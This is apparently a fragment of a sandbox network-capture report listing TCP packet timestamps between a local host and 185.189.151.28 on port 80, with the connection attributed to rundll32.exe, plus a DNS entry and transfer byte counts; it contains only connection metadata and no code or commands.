| May 4, 2022 12:42:53.581707001 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581746101 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581779957 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581787109 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581814051 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581825972 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581850052 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581861973 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581892014 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581898928 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581907034 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581927061 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.581952095 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.581984043 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.582844019 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.582926989 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.582942963 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.582962036 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.582978964 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.582998991 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583024979 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583038092 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583043098 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583090067 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583091974 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583266020 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583290100 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583329916 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583340883 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583409071 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583487034 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583540916 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583570957 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583609104 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583622932 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583643913 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583674908 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583694935 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583705902 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583722115 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.583754063 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.583765030 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.584022045 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.584084988 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.584110022 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.584162951 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.584163904 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.584202051 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.584219933 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.584239006 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.584255934 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.584274054 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.584290028 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.584300995 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.584326982 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.584362984 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.587519884 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587554932 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587584019 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587605953 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587722063 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.587755919 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587800980 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.587812901 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587835073 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.587856054 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587884903 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587938070 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587955952 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.587964058 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.587974072 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.587996006 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588026047 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588042974 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588054895 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588090897 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588104010 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588105917 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588135004 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588151932 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588170052 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588187933 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588227987 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588229895 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588242054 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588251114 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588294983 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588305950 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588324070 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588326931 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588352919 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588366985 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588381052 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588395119 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588411093 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588433981 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588444948 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588474035 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588483095 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588521957 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588526011 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588567972 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588597059 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588598967 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588639021 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588639975 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588664055 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588673115 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588705063 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588713884 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588732958 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588756084 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588778019 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588785887 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588825941 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588836908 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588856936 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588870049 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588886023 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588906050 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588932037 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.588975906 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.588979959 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589008093 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589021921 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589037895 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589063883 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589068890 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589102983 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589104891 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589123011 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589138985 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589163065 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589169979 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589181900 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589205027 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589230061 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589247942 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589248896 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589265108 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589276075 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589302063 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.589344978 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.589391947 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592093945 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592153072 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592175007 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592205048 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592242002 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592269897 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592283964 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592300892 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592346907 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592348099 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592406988 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592418909 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592531919 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592607021 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592708111 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592736006 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592736959 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592767954 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592778921 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592797995 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592818022 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592823029 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592843056 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592890978 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592900038 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592942953 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592947006 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.592953920 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.592977047 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.593007088 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.593009949 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.593029022 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.593038082 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.593070984 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.593102932 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.707282066 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:42:53.724267006 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.997746944 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.997800112 CEST | 80 | 49820 | 185.189.151.28 | 192.168.2.3 |
| May 4, 2022 12:42:53.997919083 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| May 4, 2022 12:43:43.976860046 CEST | 49820 | 80 | 192.168.2.3 | 185.189.151.28 |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| May 4, 2022 12:42:32.684524059 CEST | 8.8.8.8 | 192.168.2.3 | 0x4db9 | No error (0) | 13.107.43.16 | A (IP address) | IN (0x0001) |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.3 | 49820 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| May 4, 2022 12:42:52.800200939 CEST | 11884 | OUT | |
| May 4, 2022 12:42:53.086601019 CEST | 11886 | IN |